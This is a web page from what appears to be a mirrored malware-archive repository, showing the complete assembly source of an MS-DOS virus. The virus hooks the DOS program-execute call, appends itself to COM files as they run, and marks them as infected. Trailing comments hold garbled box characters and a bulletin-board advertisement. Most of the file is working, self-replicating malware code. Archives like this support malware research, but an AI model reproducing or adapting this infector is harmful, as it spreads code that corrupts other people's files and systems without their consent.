ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 10:26:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4121be2648
MalwareSourceCode/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.133.asm

100 lines
3.5 KiB
NASM
Raw Normal View History

re-organize push
2022-08-21 09:07:57 +00:00
VSize=085h
Code Segment
Assume CS:Code
org 0
db 4Dh
jmp Start
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
Int21: cmp ax, 4B00h
jne End21
Exec: push ax
push bx
push dx
push ds
push es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ;Zero AH
cwd ;Zero DX
mov bx, si ;Move handle to BX
mov ds, ax ;Set DS and ES to 60h,
mov es, ax ;the virus data segment
mov ah, 3Fh ;Read first 4 bytes
int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected
mov al, 2
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e. Write operation
mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX
stosw ;Complete JMP instruction
xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file
int 69h
EndExec: pop es
pop ds
pop dx
pop bx
pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation
cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, 4 ;4 bytes will be read/written
xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write
xor di, di ;Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Reference in New Issue Copy Permalink